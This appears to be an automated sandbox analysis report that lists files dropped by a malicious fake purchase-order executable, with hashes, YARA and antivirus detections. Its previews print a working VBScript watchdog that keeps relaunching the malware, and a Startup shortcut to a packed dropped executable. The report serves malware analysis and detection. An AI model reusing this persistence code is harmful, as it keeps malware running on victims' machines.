                                                                                                                                C:\Users\user\AppData\Local\Temp\QHCPYO.vbs

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):883
                                                                                                                                Entropy (8bit):5.379605100781023
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:dF/UFy7nOU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF4t+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                MD5:567D5CCC75C3E45259AC6D76AD3C2AF5
                                                                                                                                SHA1:65315386939AF674B9578E11EB967035F2D88709
                                                                                                                                SHA-256:86F8DCE3E13A624FBA879DDC1851D8AB7029D7461F9DA488E208B04123098D56
                                                                                                                                SHA-512:4A6332EF3D1620EAD1C3B27EBF9074A12107BFAA3C4AC5E833306EE510D297A918E5D5B96D02CEEF919524C55B80A136423BD5F316D4D2F7CFB4CEB3DF23D356
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_New PO - Supplier 0202AW-PER2.exe"..fileset = """C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                C:\Users\user\AppData\Local\Temp\QiEB6LP.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.263489809786905
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0GWESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hv+pAZewRDK4mW
                                                                                                                                MD5:D0AAC54F2AF61529FD6240AB3757A95A
                                                                                                                                SHA1:6418B73F125AA509DBA2D564362128BA730B0437
                                                                                                                                SHA-256:6EDB45417AC64A5F296F2DD9C25A341599D0EDC36ADD3F87DBB371D601F4D128
                                                                                                                                SHA-512:4D68B4EEC39F5EF2B9A6BB95F2CE9AEFDF168F47B267323580929F217524979EAEED9D3BA01B927454E111F1031AD5D4F076594458BF252819E8014573CD551D
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KpJoM1tp4AdK6WfzpN8FwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\QoiimdE.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2616705276434805
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+07ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                MD5:FA36B706011446AC6345950FDF14AAE2
                                                                                                                                SHA1:586F265A6A60A05A93F5B9164B2598C4A5867423
                                                                                                                                SHA-256:10497E784E87D92E87764FAB7751CC9788F083B217E248571BBBCA72A4E59164
                                                                                                                                SHA-512:7C53A16CD274DE511AE7B732DB1F472E11CD69F37D1AB431D9E56E99CCB56E1982E7358AB30B715130B359278E6FC9735CE5471B2CC564F89FA5191F56F588B6
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="G3DIb_C7xaroFqtNG3NGBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\UWGSsxf.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.245110820911036
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0hhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                MD5:24AA2BD42FB5C8A6038FAF27B8E4EE17
                                                                                                                                SHA1:EE4B14614D0F3C7753F997BD1AC03405E677A3DB
                                                                                                                                SHA-256:351D4A8F3A9102F8F9494CBB53377CABE2B9A2A235E2CB5860985E241A479464
                                                                                                                                SHA-512:D07D806ED9701EC0C66677D25FD2296D4BC7B7A1EF98D0FAC95FFBC1BDF7EA8A3D142735D038237BCF18732B68F6A47AAFD74DB6E5DD6227897302991B4360D1
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eafxxhilL-czH66thmNsPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\X4tgAH4.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.270913072926747
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0bbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2b+pAZewRDK4mW
                                                                                                                                MD5:E55566DC48DE8B0650CB4E94B509480A
                                                                                                                                SHA1:E496918D1C68C1E063F826AFF3F1EA494DD53CBD
                                                                                                                                SHA-256:8AB1A58C226BE111030D47202E6A02691F693F19F692222B1802A0211F3E9190
                                                                                                                                SHA-512:A80E96359194744345784607697A4123F57D29E1133594C9E01168BE18798BFE3FDCDA79B6DC50F3BC83B12B1D04751389E996B3CFD9E53FDC1F5C13E2A2ED05
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uicB7bZRYGL4AXkAIMf-iQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\Z6zQv3L.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.265152413268958
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                                                MD5:FFFC9F4054A1F584B6786C6824CBE4E1
                                                                                                                                SHA1:111EFB17C993E309A49852B029113096A74CF7BF
                                                                                                                                SHA-256:24E70157BD053E84D4A9BB116491A07EC9E8F1AF15FFB095A3FD7011DB3C9CA1
                                                                                                                                SHA-512:FCD2806417C175120916D81AFF2A3A00F579B7207E314C0D7DBA1819F8560B07F371C07B11A19A6CAC9C111BB30EDE8A301FC29C8C60A2036F750B210CAF3909
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZblIG_8bWAcTorKmOC5aQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\j8gHCD4.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.250758070345881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0jrTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                MD5:C0FC13C53B6A8C6075A80027DFB19139
                                                                                                                                SHA1:0C64F40CCE37392DE00F10B309C5502996EF7D60
                                                                                                                                SHA-256:F42F9EB39D0C5942BDE818CB987708C8F289A7F52ED6A37FCBDB9FF0FD28100B
                                                                                                                                SHA-512:BBF035A58D3898CEDFA3081165A849332FCB946AF3E8210A48B59E27CD47806EDD41CFDD81B3B10902223405D5F810AF75C29691713C5C1AD2618BBDE354F887
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uiMfkTnCDhufnfYnE0kFbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\tJw9uDq.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.267369662130189
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                MD5:F9F11E6BEFAA295812D629FC1E80BF25
                                                                                                                                SHA1:2979947AA27745FDBDF84E14E016ACC7808D5F52
                                                                                                                                SHA-256:AB75A6589D59C5CDFE6BDB6540B7F67596C11E5864221FAF3CFB5CE4638FC359
                                                                                                                                SHA-512:65FDC0AE34027F80061EC39CB98281CAF8A59597DFE5AEC86815C27DC43E2FF5A34C606DDB4DE6AF53C4662280ECB71FAEB60C43FF58A052ADDEF4603CC11DA7
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PVeTCkxdgMFGec9PhH7CSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\u72xGQJ.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2544016966583555
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+06ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+fI+pAZewRDK4mW
                                                                                                                                MD5:9305FF31A44395097FB02E3807B4F5AB
                                                                                                                                SHA1:18E568ED797453FA1E454620AEF572979C61FE6A
                                                                                                                                SHA-256:10FF7BAF8299A80703AB27B5EFF6620B58173F6C4AA8DCE616EB6F6891ADA28F
                                                                                                                                SHA-512:37939FEA3C500DC29F8C717FE31517E2E607C35CF21313B75AD41B62FD595B31CE87A4B2F830287EADDF5B72206A8A31E98F29CF8A70F8C8BA627511097BD2F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E4F5Kymi1IorWmRJat_PTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\wnBUqxE.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.260273217625656
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0DgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                MD5:77E43CCB49C48F39F7351E14FD450978
                                                                                                                                SHA1:B765B65DD9AB67BC69346BFB5C6945AED74E4E7E
                                                                                                                                SHA-256:24C9B132935436977843125DAC55EE18F99EAF03F5F1DA8523FCA8AA910BF27A
                                                                                                                                SHA-512:50D881B17A5C5D77D88EF8891734353992548FA30EF4C821F8A8E32BA30F49D996B88E9CB5D9D37C6456633EF0783D16CC65CBB1F805653793FE654934D842EF
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fkwrmshWrbBpaPVmC7DFSQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\x8R3sK3.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.261031432368457
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+00G/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+92+pAZewRDK4mW
                                                                                                                                MD5:6653D351FA23AE4A974B0BEB8D73917B
                                                                                                                                SHA1:33AE0E602B58A964A79AE15AA9625C52E16912DD
                                                                                                                                SHA-256:67AE455BCA608C75226AEA89E8B3D3C274451ED159F50EA0D33562CA3BA462C6
                                                                                                                                SHA-512:D9C6A11C5402F0C842E710002C44D407BED4D48DFDF00A7846B1C64225B32FAECC700F474E27E440343DFBA3C783F34C2B50E569A73E7A27F8FEB90336DBF828
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vgd0EyUIfo-03w_IjDWdCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\yKrLCcO.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2684504593235655
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0vUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+UU+pAZewRDK4mW
                                                                                                                                MD5:80D433E46654D03141E50D4C2742BD32
                                                                                                                                SHA1:DF4451B8B3B28CE0E20328264E51E82703F8F893
                                                                                                                                SHA-256:FCE4173744662D3444EC68990872CECBAD208C423C9D042AA04715F9D94CC980
                                                                                                                                SHA-512:A7D216EE862075991E5F810D3B75329E86BFE563F091F4A9C2FD81FC7444963319EA581C3880C30BDC11659D6EC6F8ADDAC94ED8DC5B0C0C361F2A67BB15F3C0
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l9Q3hhjk1jSPgFjvqw39OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\~$ExL2BsMQ.xlsm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFB00165E98F1A4FA5.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):3.746897789531007
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnk

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Tue Dec 24 16:20:00 2024, mtime=Tue Dec 24 16:20:00 2024, atime=Tue Dec 24 16:20:00 2024, length=913408, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1805
                                                                                                                                Entropy (8bit):3.4328819700053814
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:8ST6d+SDaeL+IJCA7D6jkrE2+s9T4IlQpLzBm:8STYa++Uhlbr9MIlQv
                                                                                                                                MD5:0F6D83AF2A907A1960A58F258B4BAA16
                                                                                                                                SHA1:567975E3280D5C18FC11AAB7D0E11E2ED0B26BA8
                                                                                                                                SHA-256:AD7987DE3F34FC51F833538F0730020BE364D4CD67F7E58892BF7FD0ED7D1580
                                                                                                                                SHA-512:397D8389234E0A1559FD092B6F6BC86F5B99B03EA015FDDE03278DC0A561BAFB8F354CA9F5D1A9CE2ADCF27F031963272918F1F443F1E12EE0BC51DDAF8885DD
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F.@.. .......(V..f...(V..f...(V............................:..DG..Yr?.D..U..k0.&...&......vk.v....1...(V......(V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y}............................%..A.p.p.D.a.t.a...B.V.1......Yz...Roaming.@......CW.^.Yz............................+..R.o.a.m.i.n.g.....V.1......Y....Windata.@......Y...Y............................q...W.i.n.d.a.t.a.....`.2......Y.. .NUHORT.exe..F......Y...Y......i.........................N.U.H.O.R.T...e.x.e.......`...............-......._..............4.....C:\Users\user\AppData\Roaming\Windata\NUHORT.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.N.U.H.O.R.T...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\Windata\NUHORT.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):913408
                                                                                                                                Entropy (8bit):7.877743429478407
                                                                                                                                Encrypted:false
